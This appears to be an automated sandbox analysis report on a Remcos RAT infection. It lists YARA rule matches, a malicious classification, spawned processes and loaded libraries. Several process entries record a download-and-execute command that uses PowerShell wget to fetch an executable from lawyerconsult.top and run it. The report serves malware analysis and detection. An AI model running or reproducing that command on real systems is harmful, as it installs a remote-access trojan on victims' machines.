Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.troj.expl.evad.winLNK@34/27@2/2

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

11_2_00407776

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_0040118A GetDiskFreeSpaceExW,SendMessageW,

11_2_0040118A

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

11_2_004034C1

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

11_2_00401BDF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\hello.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1

Jump to behavior

Source: Yara match	File source: 12.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1378606402.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1381062753.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\DZIPR.exe, type: DROPPED

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
